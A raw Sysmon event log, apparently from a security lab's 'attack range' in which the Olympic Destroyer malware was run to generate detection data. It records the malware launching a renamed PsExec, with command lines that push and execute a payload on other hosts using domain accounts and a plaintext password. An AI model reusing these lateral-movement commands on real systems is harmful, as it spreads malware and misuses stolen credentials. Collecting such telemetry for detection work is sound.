10:57:08.218{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.218{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.218{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.216{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.216{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.215{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.820{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1305-6216-1606-000000003802}836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.820{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1305-6216-1606-000000003802}836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.820{C8EA50B7-1305-6216-1606-000000003802}8365292C:\Windows\system32\conhost.exe{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.798{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1305-6216-1606-000000003802}836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.798{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1305-6216-1606-000000003802}836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.782{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.782{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.782{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.782{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.751{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.751{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x8000000000000000292512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.751{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000292511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.755{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 534500x8000000000000000292510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.751{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.735{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.735{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:09.275{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62012865CBB13F9A0D39821021A40879,SHA256=A72A226546E44D4FE470940E8B087DE62DA70CB01CC4647524925330D6DBDAF6,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000292507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:09.720{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.667{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.651{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.666{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.651{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1305-6216-1306-000000003802}3356C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.651{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1305-6216-1306-000000003802}3356C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.651{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1305-6216-1406-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.651{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.651{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 